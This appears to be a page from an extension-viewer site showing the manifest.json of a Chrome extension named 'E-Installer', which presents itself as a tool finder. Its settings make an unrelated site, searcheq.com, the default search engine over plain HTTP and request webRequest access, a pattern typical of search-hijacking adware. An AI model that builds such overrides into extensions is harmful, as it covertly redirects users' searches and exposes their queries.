E-Installer

E-Installer

Find top free tools & software.

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 2,
  "name": "E-Installer",
  "version": "1.0",
  "description": "Find top free tools & software.",
  "icons": {
    "16": "images/icon16.png",
    "48": "images/icon48.png",
    "128": "images/icon128.png"
  },
  "browser_action": {
    "default_icon": "images/icon16.png",
    "default_popup": "popup.html",
    "default_title": "Easy Installer"
  },
  "background": {
    "scripts": [
      "vendor/js/jquery-3.4.1.min.js",
      "background.js"
    ],
    "persistant": false
  },
  "permissions": [
    "notifications",
    "webRequest",
    "*://searcheq.com/",
    "chrome://favicon/"
  ],
  "externally_connectable": {
    "matches": [
      "*://searcheq.com/"
    ]
  },
  "web_accessible_resources": [
    "*.json"
  ],
  "content_security_policy": "script-src 'self' ; object-src 'self';",
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "EInstaller",
      "keyword": "EI",
      "encoding": "UTF-8",
      "is_default": true,
      "search_url": "http://searcheq.com/ei/?q={searchTerms}",
      "favicon_url": "http://searcheq.com/wp-content/uploads/2020/02/icon48.png"
    }
  }
}